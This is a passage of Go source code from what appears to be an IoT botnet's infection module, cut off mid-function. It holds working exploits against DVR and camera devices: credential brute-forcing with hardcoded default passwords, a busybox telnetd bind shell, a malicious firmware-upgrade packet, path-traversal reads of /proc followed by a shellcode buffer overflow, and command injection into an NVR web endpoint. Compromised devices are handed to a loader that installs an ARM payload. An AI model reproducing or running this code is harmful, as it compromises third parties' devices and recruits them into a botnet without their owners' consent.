payloadTwo := "\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26"
|
||
payloadThree := "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
|
||
|
||
conn.Write([]byte("\x5a\xa5\x01\x20\x00\x00\x00\x00"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
rdbuf = append(rdbuf, tmpbuf...)
|
||
if state == 0 && len(rdbuf) >= 4 && string(rdbuf[:4]) == "\x5a\xa5\x01\x20" {
|
||
conn.Close()
|
||
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
magicGroup.Done()
|
||
return
|
||
}
|
||
|
||
payload := payloadOne
|
||
payload += magicPacketIds[state]
|
||
payload += payloadTwo
|
||
payload += magicPayload + "f"
|
||
payload += payloadThree
|
||
|
||
conn.Write([]byte(payload))
|
||
state++
|
||
zeroByte(rdbuf)
|
||
continue
|
||
} else if state >= 1 {
|
||
conn.Close()
|
||
|
||
if state == 8 {
|
||
fmt.Printf("\x1b[38;5;46mMagic\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential payload sent to device\x1b[38;5;15m\r\n", target)
|
||
payloadSent++
|
||
magicGroup.Done()
|
||
return
|
||
}
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
magicGroup.Done()
|
||
return
|
||
}
|
||
|
||
payload := payloadOne
|
||
payload += magicPacketIds[state]
|
||
payload += payloadTwo
|
||
payload += magicPayload + "f"
|
||
payload += payloadThree
|
||
|
||
conn.Write([]byte(payload))
|
||
state++
|
||
zeroByte(rdbuf)
|
||
continue
|
||
}
|
||
}
|
||
|
||
conn.Close()
|
||
magicGroup.Done()
|
||
return
|
||
}
|
||
|
||
func infectFunctionLibdvrProto(host string, attempt int) (int, error, string, int) {
|
||
|
||
var gotAdmin int = 0
|
||
var gotShell int = 0
|
||
var password string
|
||
var rInt int = 0
|
||
|
||
rInt = rand.Intn(9999 - 9000) + 9000
|
||
|
||
conn, err := net.DialTimeout("tcp", host, time.Duration(10) * time.Second)
|
||
if err != nil {
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
defer conn.Close()
|
||
conn.SetWriteDeadline(time.Now().Add(6 * time.Second))
|
||
_, err = conn.Write([]byte("/bin/busybox BOXOFABOX\n"))
|
||
if err != nil {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
conn.SetReadDeadline(time.Now().Add(6 * time.Second))
|
||
|
||
first_buf := make([]byte, 256)
|
||
l, err := conn.Read(first_buf)
|
||
if err != nil || l <= 0 {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
if strings.Contains(string(first_buf), "user name") || strings.Contains(string(first_buf), "username") {
|
||
_, err = conn.Write([]byte("admin\n"))
|
||
if err != nil {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
} else {
|
||
if strings.Contains(string(first_buf), "BOXOFABOX: applet not found") {
|
||
gotShell = 1
|
||
} else {
|
||
_, err = conn.Write([]byte("\n"))
|
||
if err != nil {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
conn.SetReadDeadline(time.Now().Add(3 * time.Second))
|
||
first_buf := make([]byte, 256)
|
||
l, err := conn.Read(first_buf)
|
||
if err != nil || l <= 0 {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
if !strings.Contains(string(first_buf), "user name") && !strings.Contains(string(first_buf), "username") {
|
||
if strings.Contains(string(first_buf), "admin$") {
|
||
gotAdmin = 1
|
||
} else {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
} else {
|
||
_, err = conn.Write([]byte("admin\n"))
|
||
if err != nil {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
}
|
||
}
|
||
}
|
||
|
||
if gotAdmin != 1 && gotShell != 1 {
|
||
conn.SetReadDeadline(time.Now().Add(3 * time.Second))
|
||
second_buf := make([]byte, 256)
|
||
l2, err := conn.Read(second_buf)
|
||
if err != nil || l2 <= 0 {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
if strings.Contains(string(second_buf), "pass word") || strings.Contains(string(second_buf), "password") {
|
||
if attempt == 0 {
|
||
password = "I0TO5Wv9"
|
||
} else if attempt == 1 {
|
||
password = "123456"
|
||
} else if attempt == 2 {
|
||
password = "admin"
|
||
}
|
||
|
||
_, err = conn.Write([]byte(password + "\n"))
|
||
if err != nil {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
conn.SetReadDeadline(time.Now().Add(3 * time.Second))
|
||
second_buf := make([]byte, 1024)
|
||
l, err := conn.Read(second_buf)
|
||
if err != nil || l <= 0 {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
if strings.Contains(string(second_buf), "admin$") {
|
||
gotAdmin = 1
|
||
} else {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
} else if strings.Contains(string(second_buf), "admin$") {
|
||
gotAdmin = 1
|
||
} else {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
}
|
||
|
||
if gotAdmin == 1 || gotShell == 1 {
|
||
conn.Write([]byte("shell\n"))
|
||
conn.Write([]byte("/bin/busybox BOXOFABOX\n"))
|
||
|
||
new_buf := make([]byte, 128)
|
||
l, err := conn.Read(new_buf)
|
||
if err != nil || l <= 0 {
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
|
||
if strings.Contains(string(new_buf), "BOXOFABOX: applet not found") {
|
||
conn.Write([]byte("/bin/busybox telnetd -p" + strconv.Itoa(rInt) + " -l/bin/sh\n"))
|
||
conn.Write([]byte("exit\n"))
|
||
conn.Write([]byte("quit\n"))
|
||
conn.Close()
|
||
|
||
time.Sleep(3 * time.Second)
|
||
return 1, nil, password, rInt
|
||
} else {
|
||
conn.Write([]byte("exit\n"))
|
||
conn.Write([]byte("quit\n"))
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
} else {
|
||
conn.Write([]byte("quit\n"))
|
||
conn.Close()
|
||
return 0, nil, "", 0
|
||
}
|
||
}
|
||
|
||
func infectFunctionLibdvr(target string) {
|
||
|
||
splitStr := strings.Split(target, ":")
|
||
for i := 0; i < 3; i++ {
|
||
exploited, err, _, port := infectFunctionLibdvrProto(target, i)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
if exploited == 1 {
|
||
fmt.Printf("\x1b[38;5;46mLibdvr\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell\x1b[38;5;15m\r\n", target)
|
||
telnetLoader(splitStr[0] + ":" + strconv.Itoa(port), 0, "arm7", loaderLibdvrTag)
|
||
return
|
||
}
|
||
}
|
||
}
|
||
|
||
func infectFunctionDvrip(target string) {
|
||
|
||
var (
|
||
bytebuf []byte = []byte("")
|
||
adminPasswords []string = []string{"tlJwpbo6", "S2fGqNFs", "OxhlwSG8", "ORsEWe7l", "nTBCS19C"}
|
||
username string = "admin"
|
||
password string = ""
|
||
attempt int = 0
|
||
authed int = 0
|
||
)
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
for
|
||
{
|
||
if attempt >= 5 {
|
||
break
|
||
} else {
|
||
password = adminPasswords[attempt]
|
||
}
|
||
|
||
conn.Write([]byte("\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x64\x00\x00\x00{ \"EncryptType\" : \"MD5\", \"LoginType\" : \"DVRIP-Web\", \"PassWord\" : \"" + password + "\", \"UserName\" : \"" + username + "\" }\x0a"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
break
|
||
}
|
||
|
||
bytebuf = append(bytebuf, tmpbuf...)
|
||
if strings.Contains(string(bytebuf), "}") {
|
||
break
|
||
}
|
||
}
|
||
|
||
dvrret, err := strconv.Atoi(getStringInBetween(string(bytebuf), "\"Ret\" : ", ", \"SessionID"))
|
||
if err != nil {
|
||
authed = 0
|
||
break
|
||
}
|
||
|
||
if dvrret == DVRIP_OK {
|
||
authed = 1
|
||
}
|
||
|
||
dvrret = DVRIP_NORESP
|
||
|
||
if authed == 1 {
|
||
break
|
||
}
|
||
|
||
attempt++
|
||
continue
|
||
}
|
||
|
||
if authed != 1 {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x03\x35\x00\x00\x00{ \"Name\" : \"KeepAlive\", \"SessionID\" : \"0x00000004\" }\x0a"))
|
||
zeroByte(bytebuf)
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
bytebuf = append(bytebuf, tmpbuf...)
|
||
if strings.Contains(string(bytebuf), "}") {
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(bytebuf)
|
||
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x05\x73\x00\x00\x00{ \"Name\" : \"OPSystemUpgrade\", \"OPSystemUpgrade\" : { \"Action\" : \"Start\", \"Type\" : \"System\" }, \"SessionID\" : \"0x00000004\" }\x0a"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
bytebuf = append(bytebuf, tmpbuf...)
|
||
if strings.Contains(string(bytebuf), "}") {
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(bytebuf)
|
||
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x05\x62\x01\x00\x00\x50\x4B\x03\x04\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\xB5\x90\x3D\x0B\xC2\x30\x10\x86\x77\x7F\xC5\x91\xD9\x62\x15\x1C\x74\xAD\x88\xAE\x56\x5D\xC4\x21\x35\x87\x0D\xC6\xE4\x48\xE2\x47\x91\xFE\x77\xDB\x14\x11\xAB\x8B\x88\x37\x64\x79\xDE\x7B\x2E\x77\xB7\x0E\x00\x5B\xD1\xDE\x72\x81\x89\x39\x1E\xB9\x16\x6C\x0C\x9B\x0E\x54\x55\xB1\x50\xEC\x09\x58\x9A\xA3\x52\xAC\xFB\x20\xE9\xCE\x4A\xF2\x35\xF0\xA8\x34\x7A\x01\x11\xC1\x28\x8E\xFB\x10\x29\xE8\x65\x52\xF7\x5C\xCE\x42\xB8\xEC\x7E\xEF\xCC\x4E\xAE\xC8\xCC\x15\xFE\xE1\x76\x0A\x91\x60\x30\x1C\x0D\xE2\xF8\xF7\x1F\x7E\xB0\x55\xEF\xB6\xEE\x60\x33\x6E\xC5\x85\x5B\x0C\xA2\x83\xA4\x24\xC7\xDD\x81\x05\x94\x9E\x88\x8C\xF5\x53\xC5\x5D\xBE\x2C\x08\xDF\x4F\x1F\xD0\x7C\xF2\xD2\xDB\x1E\x30\xC1\x73\x48\xB4\xED\x6B\xD4\xC2\xD8\x36\x68\x36\x23\xEE\x65\xA6\x70\x8D\xD6\x49\xA3\xAB\x4C\xD4\x6F\xD0\x22\x69\xCD\x2A\xEF\x50\x4B\x01\x02\x3F\x03\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x24\x00\x00\x00\x00\x00\x00\x00\x20\x80\xA4\x81\x00\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\x0A\x00\x20\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xCA\x6F\xF3\x26\x5C\xD5\x01\x00\x40\x5B\x5C\x2F\x5C\xD5\x01\x80\xD6\xF3\x5C\x2F\x5C\xD5\x01\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x5D\x00\x00\x00\xEF\x00\x00\x00\x00\x00"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
ln, err := conn.Read(tmpbuf)
|
||
if ln <= 0 || err != nil {
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
bytebuf = append(bytebuf, tmpbuf...)
|
||
if strings.Contains(string(bytebuf), "}") {
|
||
break
|
||
}
|
||
}
|
||
|
||
zeroByte(bytebuf)
|
||
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x01\xf2\x05\x00\x00\x00\x00"))
|
||
|
||
splitStr := strings.Split(target, ":")
|
||
time.Sleep(10 * time.Second)
|
||
|
||
fmt.Printf("\x1b[38;5;46mDvrip\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell opened\x1b[38;5;15m\r\n", target)
|
||
go telnetLoader(splitStr[0] + ":9001", 0, "arm7", loaderDvripTag)
|
||
|
||
conn.Write([]byte("\xFF\x01\x00\x00\x57\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x03\x27\x00\x00\x00{ \"Name\" : \"\", \"SessionID\" : \"0x00000004\" }\x0a"))
|
||
conn.Close()
|
||
return
|
||
}
|
||
|
||
/* ------ END OF THE OTHER STUFF ------ */
|
||
|
||
func ucSofiaCheck(target string, pid string) (found int) {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return -1
|
||
}
|
||
|
||
defer conn.Close()
|
||
tmp := make([]byte, 256)
|
||
buf := make([]byte, 0, 512)
|
||
|
||
fmt.Fprintf(conn, "GET ../../proc/%s/cmdline HTTP\r\n\r\n", pid)
|
||
for {
|
||
n, err := conn.Read(tmp)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
buf = append(buf, tmp[:n]...)
|
||
}
|
||
|
||
if (strings.Contains(string(buf), "/var/Sofia") || strings.Contains(string(buf), "usr/bin/Sofia") || strings.Contains(string(buf), "system_sofia") || strings.Contains(string(buf), "/var/bin/system_sofia")) && !strings.Contains(string(buf), "dvrHelper") {
|
||
return 1
|
||
} else {
|
||
return -1
|
||
}
|
||
}
|
||
|
||
func ucGuessSmaps(target string, pid string) (found int) {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return -1
|
||
}
|
||
|
||
defer conn.Close()
|
||
tmp := make([]byte, 8096)
|
||
buf := make([]byte, 0, 512)
|
||
|
||
fmt.Fprintf(conn, "GET ../../proc/%s/smaps HTTP\r\n\r\n", pid)
|
||
for {
|
||
n, err := conn.Read(tmp)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
buf = append(buf, tmp[:n]...)
|
||
}
|
||
|
||
smapsLines := strings.Split(string(buf), "\n")
|
||
smapsCount := 0
|
||
gotRegion := 0
|
||
regionsAdded := 0
|
||
|
||
for i := 0; i < len(smapsLines); i++ {
|
||
if !strings.Contains(string(smapsLines[i]), "rwxp") {
|
||
continue
|
||
}
|
||
|
||
smapsCount++
|
||
}
|
||
|
||
smapsRegions := make([]*smapsRegion, smapsCount)
|
||
for i := range smapsRegions {
|
||
smapsRegions[i] = &smapsRegion{}
|
||
}
|
||
|
||
for i := 0; i < len(smapsLines); i++ {
|
||
if gotRegion == 8 || gotRegion == 0 {
|
||
if !strings.Contains(string(smapsLines[i]), "rwxp") {
|
||
continue
|
||
}
|
||
|
||
region := strings.Split(string(smapsLines[i]), "-")
|
||
smapsRegions[regionsAdded].region = hexToInt(region[0])
|
||
|
||
for q := 0; q < len(region); q++ {
|
||
region[q] = ""
|
||
}
|
||
|
||
gotRegion = 1
|
||
} else {
|
||
if gotRegion == 1 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].size, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 2
|
||
continue
|
||
}
|
||
|
||
} else if gotRegion == 2 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].rss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 3
|
||
continue
|
||
}
|
||
} else if gotRegion == 3 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].pss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 4
|
||
continue
|
||
}
|
||
} else if gotRegion == 4 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].shared_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 5
|
||
continue
|
||
}
|
||
} else if gotRegion == 5 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].shared_ditry, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 6
|
||
continue
|
||
}
|
||
} else if gotRegion == 6 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].private_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 7
|
||
continue
|
||
}
|
||
} else if gotRegion == 7 {
|
||
startAt := 0
|
||
endAt := 0
|
||
|
||
for q := 0; q < len(smapsLines[i]); q++ {
|
||
if startAt == 0 {
|
||
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
|
||
startAt = q
|
||
continue
|
||
}
|
||
}
|
||
if endAt == 0 && startAt > 0 {
|
||
if smapsLines[i][q:q+1] == " " {
|
||
endAt = q
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
if startAt > 0 && endAt > 0 {
|
||
smapsRegions[regionsAdded].private_dirty, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
|
||
gotRegion = 8
|
||
regionsAdded++
|
||
continue
|
||
}
|
||
}
|
||
|
||
gotRegion++
|
||
}
|
||
}
|
||
|
||
for i := len(smapsRegions) - 7; i > 1; i-- {
|
||
if smapsRegions[i].size == 8188 && smapsRegions[i + 1].size == 8188 && smapsRegions[i + 2].size == 8188 && smapsRegions[i + 3].size == 8188 && smapsRegions[i + 4].size == 8188 && smapsRegions[i + 5].size == 8188 && smapsRegions[i + 6].size == 8188 {
|
||
if smapsRegions[i].rss == 4 && smapsRegions[i + 1].rss == 4 && smapsRegions[i + 2].rss == 4 && smapsRegions[i + 3].rss >= 8 && smapsRegions[i + 4].rss >= 4 && smapsRegions[i + 5].rss >= 4 && smapsRegions[i + 6].rss >= 8 {
|
||
return int(smapsRegions[i + 3].region)
|
||
}
|
||
}
|
||
}
|
||
|
||
return 0
|
||
}
|
||
|
||
func ucSendBof(target string, offset int) {
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
defer conn.Close()
|
||
|
||
v := uint32(offset)
|
||
offsetBuf := make([]byte, 4)
|
||
binary.LittleEndian.PutUint32(offsetBuf, v)
|
||
|
||
conn.Write([]byte("GET "))
|
||
conn.Write([]byte(uchttpdShellCode))
|
||
|
||
for i := 0; i < 299 - len(uchttpdShellCode); i ++ {
|
||
conn.Write([]byte("a"))
|
||
}
|
||
|
||
conn.Write([]byte(offsetBuf))
|
||
conn.Write([]byte(" HTTP\r\n\r\n"))
|
||
|
||
buf := make([]byte, 0, 512)
|
||
tmp := make([]byte, 256)
|
||
|
||
for {
|
||
n, err := conn.Read(tmp)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
buf = append(buf, tmp[:n]...)
|
||
}
|
||
|
||
zeroByte(buf)
|
||
zeroByte(tmp)
|
||
}
|
||
|
||
func infectFunctionUchttpd(target string) {
|
||
|
||
var pidStrs[128] string
|
||
var pidsFound int = 0
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
/* Dvrip check */
|
||
go func() {
|
||
ipslit := strings.Split(target, ":")
|
||
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":34567", 10 * time.Second)
|
||
if err == nil {
|
||
tmpconn.Close()
|
||
infectFunctionDvrip(ipslit[0] + ":34567")
|
||
}
|
||
} ()
|
||
/* ////////////// */
|
||
|
||
/* Libdvr check */
|
||
go func() {
|
||
ipslit := strings.Split(target, ":")
|
||
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":9527", 10 * time.Second)
|
||
if err == nil {
|
||
tmpconn.Close()
|
||
infectFunctionLibdvr(ipslit[0] + ":9527")
|
||
}
|
||
} ()
|
||
/* ////////////// */
|
||
|
||
tmp := make([]byte, 256)
|
||
buf := make([]byte, 0, 512)
|
||
|
||
fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
|
||
for {
|
||
n, err := conn.Read(tmp)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
buf = append(buf, tmp[:n]...)
|
||
}
|
||
|
||
if !strings.Contains(string(buf), "Index of /mnt/web/") {
|
||
zeroByte(tmp)
|
||
zeroByte(buf)
|
||
conn.Close()
|
||
time.Sleep(10 * time.Second)
|
||
return
|
||
}
|
||
|
||
zeroByte(tmp)
|
||
zeroByte(buf)
|
||
|
||
conn.Close()
|
||
conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
time.Sleep(10 * time.Second)
|
||
return
|
||
}
|
||
|
||
buf = make([]byte, 0, 8096)
|
||
tmp = make([]byte, 256)
|
||
|
||
fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
|
||
for {
|
||
n, err := conn.Read(tmp)
|
||
if err != nil {
|
||
break
|
||
}
|
||
|
||
buf = append(buf, tmp[:n]...)
|
||
}
|
||
|
||
pids := strings.Split(string(buf), "\n")
|
||
for i := 0; i < len(pids); i++ {
|
||
if i >= 128 {
|
||
break
|
||
}
|
||
|
||
if len(pids[i]) < 38 {
|
||
continue
|
||
}
|
||
|
||
if _, err := strconv.Atoi(pids[i][33:34]); err != nil {
|
||
continue
|
||
}
|
||
|
||
pidstr := pids[i][33:38]
|
||
if _, err := strconv.Atoi(pidstr[0:1]); err == nil {
|
||
if _, err := strconv.Atoi(pidstr[1:2]); err == nil {
|
||
if _, err := strconv.Atoi(pidstr[2:3]); err == nil {
|
||
if _, err := strconv.Atoi(pidstr[3:4]); err == nil {
|
||
if _, err := strconv.Atoi(pidstr[4:5]); err == nil {
|
||
if len(pidstr[0:]) >= 5 {
|
||
pidStrs[pidsFound] = pidstr[0:5]
|
||
pidsFound++
|
||
continue
|
||
}
|
||
} else {
|
||
if len(pidstr[0:]) >= 4 {
|
||
pidStrs[pidsFound] = pidstr[0:4]
|
||
pidsFound++
|
||
continue
|
||
}
|
||
}
|
||
} else {
|
||
if len(pidstr[0:]) >= 3 {
|
||
pidStrs[pidsFound] = pidstr[0:3]
|
||
pidsFound++
|
||
continue
|
||
}
|
||
}
|
||
} else {
|
||
if len(pidstr[0:]) >= 2 {
|
||
pidStrs[pidsFound] = pidstr[0:2]
|
||
pidsFound++
|
||
continue
|
||
}
|
||
}
|
||
} else {
|
||
if len(pidstr[0:]) >= 1 {
|
||
pidStrs[pidsFound] = pidstr[0:1]
|
||
pidsFound++
|
||
continue
|
||
}
|
||
}
|
||
}
|
||
|
||
pidstr = ""
|
||
}
|
||
|
||
zeroByte(buf)
|
||
zeroByte(tmp)
|
||
|
||
if pidsFound <= 5 {
|
||
conn.Close()
|
||
time.Sleep(10 * time.Second)
|
||
return
|
||
}
|
||
|
||
conn.Close()
|
||
|
||
for i := pidsFound; i > 1; i-- {
|
||
retval := ucSofiaCheck(target, pidStrs[i])
|
||
if retval == -1 {
|
||
continue
|
||
}
|
||
|
||
retval = ucGuessSmaps(target, pidStrs[i])
|
||
if retval == -1 {
|
||
continue
|
||
}
|
||
|
||
stackOffset := retval + 0x7fd3d8 + 20
|
||
ucSendBof(target, stackOffset)
|
||
break
|
||
}
|
||
|
||
for i := 0; i < pidsFound; i++ {
|
||
pidStrs[i] = ""
|
||
}
|
||
|
||
zeroByte(buf)
|
||
zeroByte(tmp)
|
||
time.Sleep(10 * time.Second)
|
||
return
|
||
}
|
||
|
||
func infectFunctionTvt(target string) {
|
||
|
||
var rdbuf []byte = []byte("")
|
||
|
||
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
|
||
if err != nil {
|
||
return
|
||
}
|
||
|
||
/* TVT4567 check */
|
||
go func() {
|
||
ipslit := strings.Split(target, ":")
|
||
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":4567", 10 * time.Second)
|
||
if err == nil {
|
||
infectFunctionTvt4567(tmpconn)
|
||
}
|
||
|
||
return
|
||
} ()
|
||
/* ////////////// */
|
||
|
||
payload := "<?xml version=\"1.0\" encoding=\"utf-8\"?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\"filterTypeMode\">refuse</filterType><filterList type=\"list\"><itemType><addressType type=\"addressType\"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$("
|
||
payload += tvtWebPayload
|
||
payload += ")</ip></item></filterList></content></request>"
|
||
|
||
cntlen := strconv.Itoa(len(payload))
|
||
|
||
conn.Write([]byte("POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: " + cntlen + "\r\nAccept-Language: en-us\r\nHost: " + target + "\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n" + payload + "\r\n\r\n"))
|
||
|
||
for {
|
||
tmpbuf := make([]byte, 128)
|
||
